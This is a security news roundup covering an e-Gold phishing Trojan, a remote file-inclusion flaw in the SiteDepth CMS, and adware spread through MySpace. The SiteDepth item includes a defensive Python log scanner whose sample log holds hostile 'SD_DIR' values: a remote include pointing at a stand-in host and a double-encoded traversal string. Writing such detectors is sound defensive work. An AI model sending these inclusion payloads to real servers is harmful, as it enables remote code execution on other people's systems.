Security Bytes: Spam that glitters isn't gold


Spam that glitters isn't gold
According to the SANS Internet Storm Center, an emerging email scam could result in end-users' computers becoming infected by a string of malicious files.

In a posting to the ISC Handler's Diary Sunday, ISC Director Marcus Sachs detailed the contents of an email that has started making the rounds in recent days.

The text of the message includes information about an alleged transaction involving e-Gold Ltd., an electronic payment site. The author attempts to convince the recipient that she lost currency from a transaction, and attaches a file called screen.zip that is presented as a screenshot detailing the problem. When opened, that file drops a series of executables and .dll files on a victim's machine, one of which includes a spyware-spreading Trojan that attempts to steal e-Gold account information.

Sachs said the issue and analysis were submitted to the ISC by a reader. "Readers… are the backbone of the SANS Internet Storm Center and we really appreciate those who send in their own analysis for us to turn around in alerts to others," Sachs said.

SiteDepth subject to .php vulnerability
The French Security Incident Response Team (FrSIRT) is one of several organizations warning of a flaw in SiteDepth, a content management system used primarily by adult Web site operators, that could enable attackers to execute arbitrary commands.

Late last week FrSIRT warned of the issue, which was first reported by David "Aesthetico" Vieira-Kurz of German security firm Major Security.

"This flaw is due to an input validation error in the 'constants.php' script that fails to validate the 'SD_DIR' parameter, which could be exploited by remote attackers to include malicious files and execute arbitrary commands with the privileges of the Web server," said FrSIRT.

The issue affects SiteDepth version 3.0.1 and prior. A patch has not yet been issued by the vendor.
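
With no vendor patch available, one defensive step is to search Web server access logs for requests that hand a remote or traversal-style 'SD_DIR' value to a constants.php script. The Python below is an added example, not code from FrSIRT, Major Security or SiteDepth; the combined log format, the sample log lines and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request line as it appears in common/combined access logs.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Values that steer an include path away from the local install directory:
# a leading "scheme:", a leading "//" or "\\" host prefix, "../" traversal, NUL.
SUSPICIOUS = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//|\\\\)|\.\.[/\\]|\x00", re.I)

def suspicious_sd_dir(line):
    """Return the decoded SD_DIR value if the log line is a request to a
    constants.php script carrying a suspicious SD_DIR, otherwise None.
    Only query strings are visible in access logs; POST bodies are not."""
    m = REQUEST.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().endswith("/constants.php"):
        return None
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key != "SD_DIR":
            continue
        # parse_qsl decoded once; decode again to catch double-encoded values.
        decoded = unquote(value)
        if SUSPICIOUS.search(decoded):
            return decoded
    return None

def scan(lines):
    """Return (line_number, SD_DIR value) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_sd_dir(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample input (documentation addresses, non-resolving host name).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2000:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2000:10:00:05 +0000] "GET /cms/constants.php?SD_DIR=http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 87
192.0.2.12 - - [01/Jan/2000:10:00:09 +0000] "GET /constants.php?SD_DIR=%252e%252e%252f%252e%252e%252f HTTP/1.1" 200 87
192.0.2.13 - - [01/Jan/2000:10:00:12 +0000] "GET /constants.php?SD_DIR=includes/ HTTP/1.1" 200 87
"""

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG.splitlines()):
        print(f"line {number}: SD_DIR={value!r}")
```

A hit shows only that such a request was logged; whether the include succeeded has to be checked against the response and the server's own state.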

McAfee warns of adware on MySpace
Social networking site MySpace may be popular among young and old alike, but not all the media clips being shared there are for harmless fun.

In its Avert Labs Blog, antivirus vendor McAfee Inc. warned that not only have a pair of MySpace viruses circulated this year, but the site has also become a hotbed for adware.

More specifically, McAfee's Allysa Myers noted the recent Washington Post report that an advertisement posted on MySpace used the Windows Meta File (WMF) exploit that Microsoft patched earlier this year to install adware. Plus, another organization has reportedly created fake MySpace profiles to increase adware installations.

That means harmless MySpace surfing during the workday may not be so harmless after all. "There's really nothing to prevent profiles being created for questionable purposes," Myers wrote.